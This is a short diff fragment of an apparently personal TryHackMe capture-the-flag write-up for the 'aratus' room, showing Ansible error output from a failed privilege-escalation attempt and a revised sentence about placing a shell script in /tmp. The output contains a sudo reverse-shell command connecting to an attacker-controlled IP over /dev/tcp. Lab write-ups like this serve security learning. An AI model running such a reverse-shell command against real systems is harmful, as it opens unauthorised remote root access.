Minatour123/TryHackMe_Writeups/WriteUp_aratus.md

 fatal: [10.10.102.251]: FAILED! => {"changed": true, "cmd": ["sudo", "/bin/sh", "-i", ">&", "/dev/tcp/10.9.13.203/9001", "0>&1"], "delta": "0:00:00.022810", "end": "2022-03-26 20:04:00.938186", "msg": "non-zero return code", "rc": 127, "start": "2022-03-26 20:04:00.915376", "stderr": "sh: >&: No such file or directory", "stderr_lines": ["sh: >&: No such file or directory"], "stdout": "", "stdout_lines": []}
 ```

-Since it does say no such file or directory, I thought that maybe we could create a text file and then just run it with the file we can edit.
+Since it does say no such file or directory, I thought that maybe we could create a text file and then just run it with the file we can edit using bash in the command: line.

 So we go to /tmp and create a text file called shell.sh containing our shell.